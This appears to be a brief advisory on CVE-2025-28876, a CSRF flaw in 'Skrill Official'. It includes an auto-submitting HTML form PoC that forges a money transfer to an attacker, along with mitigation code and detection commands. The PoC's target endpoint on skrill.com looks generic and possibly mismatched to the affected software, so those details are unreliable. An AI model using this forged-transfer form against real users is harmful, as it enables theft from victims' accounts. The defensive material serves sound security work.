How the CVE Works:
CVE-2025-28876 is a CSRF vulnerability in Skrill Official (versions up to 1.0.65) that allows attackers to trick authenticated users into executing unintended actions. Since the application does not properly validate request origins, an attacker can craft a malicious webpage or link that forces the victim’s browser to send unauthorized requests (e.g., fund transfers or profile changes) while logged into Skrill. The lack of anti-CSRF tokens or SameSite cookie enforcement enables this exploit.
DailyCVE Form:
Platform: Skrill Official
Version: ≤1.0.65
Vulnerability: CSRF
Severity: Medium
Date: 04/09/2025
What Undercode Say:
Analytics:
- Attack Vector: Network (exploitable via malicious links)
- Impact: Unauthorized actions (e.g., payments)
- Patch Status: Fixed in >v1.0.65
Exploit Command:
<!-- Malicious CSRF PoC (hosted on attacker site) -->
<form action="https://skrill.com/transfer" method="POST">
  <input type="hidden" name="amount" value="1000">
  <input type="hidden" name="recipient" value="attacker">
</form>
<script>document.forms[0].submit();</script>
Protection Commands:
1. Enable CSRF Tokens (PHP Example):
<?php
session_start();
// Generate one unpredictable token per session and keep the server-side copy in the session.
$token = bin2hex(random_bytes(32));
$_SESSION['csrf_token'] = $token;
// Embed $token as a hidden field in every state-changing form and compare it with hash_equals() on submit.
2. SameSite Cookie Header (Apache):
# Requires mod_headers; appends SameSite=Strict to every Set-Cookie header
Header edit Set-Cookie ^(.*)$ "$1; SameSite=Strict"
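The two protections above combine into a server-side check that rejects the auto-submitted cross-site form shown in the PoC. This is an added illustration, not code from Skrill or the plugin; the origin `https://skrill.example`, the session and form dictionaries are constructed for the demo:

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed for the demo: the site's own origin that legitimate forms post from.
ALLOWED_ORIGIN = "https://skrill.example"


def issue_csrf_token(session: dict) -> str:
    """Synchronizer token pattern: one random token per session, stored server-side."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def origin_allowed(headers: dict) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) is our own site."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed: browsers send Origin on cross-site POSTs
    parsed = urlparse(source)
    return f"{parsed.scheme}://{parsed.netloc}" == ALLOWED_ORIGIN


def validate_state_change(session: dict, form: dict, headers: dict) -> bool:
    """A state-changing POST needs a matching token AND an acceptable origin."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False
    return origin_allowed(headers)


def demo() -> tuple:
    session = {"user": "victim"}  # constructed: an authenticated session
    token = issue_csrf_token(session)
    # Legitimate same-site submission: carries the token and our Origin.
    legit = validate_state_change(
        session, {"amount": "10", "csrf_token": token}, {"Origin": ALLOWED_ORIGIN})
    # Cross-site auto-submitted form like the PoC: no token, foreign Origin.
    forged = validate_state_change(
        session, {"amount": "1000", "recipient": "attacker"},
        {"Origin": "https://attacker.example"})
    # Defence in depth: even with a valid token, a foreign Origin is refused.
    foreign = validate_state_change(
        session, {"amount": "1000", "csrf_token": token},
        {"Origin": "https://attacker.example"})
    return legit, forged, foreign
```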
Mitigation Steps:
- Update to Skrill Official >v1.0.65.
- Implement CSRF tokens in all state-changing requests.
- Configure cookies with SameSite=Strict.
Detection (CURL Check):
curl -I https://skrill.com | grep -i "Set-Cookie"
Verify that each Set-Cookie line carries a SameSite attribute.
Log Analysis (Failed CSRF Attempts):
grep "CSRF token mismatch" /var/log/skrill/access.log
References:
- Patchstack Advisory: [PS-2025-28876]
- OWASP CSRF Guide: https://owasp.org/www-community/attacks/csrf
- Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28876